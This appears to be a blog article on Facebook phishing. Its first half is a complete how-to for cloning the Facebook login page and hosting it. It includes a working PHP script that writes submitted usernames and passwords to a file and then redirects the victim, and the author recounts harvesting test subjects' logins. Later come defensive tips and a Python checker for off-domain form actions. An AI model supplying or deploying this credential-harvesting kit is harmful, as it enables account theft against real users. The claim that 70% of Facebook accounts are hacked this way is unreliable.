How to escape phishing
*The basic concept*
_____________________________
Most, if not all, computer geeks here will have heard of the word “phishing”, or even know what it’s about.
Whether you know or not, I will take my time to explain what phishing is all about in this article.
*WHAT IS PHISHING?*
Phishing is the process of setting up a fake website or webpage that imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:
A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials.
*How to make a phishing page*
Note that while this article is for educational purposes, we would not be responsible for any malicious ideas.
Our test subject here is Facebook. But this method can be on any other social media that has a web version.
Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor). If using Notepad, hit ctrl f (which is the find hotkey) and search for action. You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”Save this file somewhere on your computer with the file name ofindex.htm. Omit the final period from the filename. This is going to become your phishing page.Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:
*Note* post.php is a php code or file that captures the login details and saves them to your site. If you don’t know how/what to write on notepad while creating the post.php document, copy and paste the below code into Notepad. 👇
<?php header (‘Location:http://www.facebook.com/’); $handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value); fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Then save it as post.php. And read on. At this point, you should now have two files saved: index.htm andpost.php.Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using 000Webhost. After you have signed up for an account, browse to the control panel, and then to file manager.Once the window opens, go topublick_html.Delete default.php, and then upload index.htm and post.php.Next, click on a preview ofindex.htm. As you’ll notice, it should look nearly identical to the Facebook login page.The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.Now go back to the file managerand public_html. There should be a file labeled username.txt. Open this file and you should be able to see login credentials that have been entered by a test user.
*Final thoughts*
It wasn’t as hard as it seemed, right? But anyone could be a victim, even you.
*The main knowledge (Escaping the attack)*
Although phishing might seem like an old-school method of hacking, this attack still threatens the modern world as more and more people fall victim every day. In fact, 70% of Facebook accounts are being hacked using this method.
As a computer programmer and social engineer, I have a responsibility to make the world a better place. I had to perform some tasks and experiments in order to balance the negative impact of technology on the world, and one of those experiments was making a phishing page. I made a phishing page using the genuine method known by most hackers and tested it. In fact, I had some test subjects, which I’d rather refer to as victims even though they weren’t harmed in the process. I sent them the link, they *_logged in_* and I had their details. If you noticed, I put the term “logged in” in bold and italics, and I’ll explain why later in the article.
So, when I had used the phishing page for some time, I sat down and thought, ‘What if it was me?’ I imagined being in my victim’s shoes. Even if I was and wasn’t sure, how would I escape such attempts to intrude into my privacy? So I began to analyse the source code and the logic behind each of them.
Then I found out that the only change I had made to the original source code of the login page was the *action* of the HTML form, which sends the details to the Facebook server; the server checks the password and email for errors before returning either login access or a login error message to the user. We then exchanged this *action* for a PHP file instead. The logic of that was to capture the details and send them to your site instead of Facebook.com, which was initially there. Once the user clicks on the login button, the PHP code runs and performs its task of creating a file named “usernames.txt” in your website’s file manager and saving the captured data there, in the form of a table. But there is actually more to this attack than deceit, which is psychology.
The psychology is that when an Internet user is directed to a Facebook login page, he is expected to input his correct login details to gain access to his account, which is normal, maybe because the interface is just like the Facebook login page he or she sees every day, or maybe because it just says Facebook up in the logo. Phishing uses that same psychology: when a user is sent a link and clicks on it to see a Facebook login page, he is naturally prompted to log in. A paranoid user will check the link in the browser’s address bar to see whether it really says Facebook.com (which is the normal way of avoiding such attacks), while a normal or desperate user will just go on and log in. Take note of the fact that when the victim clicks on the login button, the victim does not log in through the form but is instead redirected to Facebook.com, which will then appear as a successful login (that is the reason for placing “logged in” in bold and italics earlier), especially when the person has been using the same computer to access Facebook and has a saved password or the browser’s own saved cache and cookies.
*Escaping it for sure*
Now let’s make this a little bit fun. Say you received a link that appears to take you to a *_Facebook_* login page, and the nervous attacker is expecting you to *_log in_*. You might want to take a second look at the link above your tab to see if it says mhhg.facebook.com or loginmefacebook.com, or any funny name containing the word Facebook, because the domain name Facebook.com has been taken and can’t be used again. Now, when you’ve confirmed the false login page, smile and try the craziest thing in your life: try putting in wrong login details and see what happens. You still get to log in even with the wrong password and username 😆. I know, it’s crazy, right? Well, the good news is no one gets hurt. The paranoid attacker gets the wrong details, while your account stays safe.
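The two checks described above, the address-bar check and the rewritten form *action*, as an added Python example (not code from the original article). Only the owner of facebook.com can create hostnames ending in .facebook.com, so the test is on the end of the hostname, not on whether the word Facebook appears somewhere in it. The function names and the sample markup are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a cloned login form whose action was rewritten to post.php.
CLONED_FORM = ('<form action="post.php" method="post"><input name="email">'
               '<input type="password" name="pass"></form>')

def host_belongs_to(host, domain):
    """True only if host is the domain itself or a subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return host == domain or host.endswith("." + domain)

class PasswordForms(HTMLParser):
    """Collects the action attribute of every form holding a password input."""

    def __init__(self):
        super().__init__()
        self.actions, self._action, self._has_pw = [], None, False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._action, self._has_pw = attrs.get("action") or "", False
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self._has_pw = self._action is not None  # only counts inside a form

    def handle_endtag(self, tag):
        if tag == "form" and self._action is not None:
            if self._has_pw:
                self.actions.append(self._action)
            self._action = None

def assess_login_page(page_url, html, expected="facebook.com"):
    """Return findings for a page claiming to be `expected`; empty means clean."""
    findings = []
    page = urlsplit(page_url)
    if page.scheme != "https" or not host_belongs_to(page.hostname, expected):
        findings.append(f"page is not served from {expected} over https")
    parser = PasswordForms()
    parser.feed(html)
    parser.close()
    for action in parser.actions:
        # A relative action such as post.php resolves against the page's own host.
        target = urlsplit(urljoin(page_url, action)).hostname
        if not host_belongs_to(target, expected):
            findings.append(f"password form posts to {target}")
    return findings

print(assess_login_page("http://loginmefacebook.com/index.htm", CLONED_FORM))
```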
Now that you know the logic behind phishing, feel safe on the web.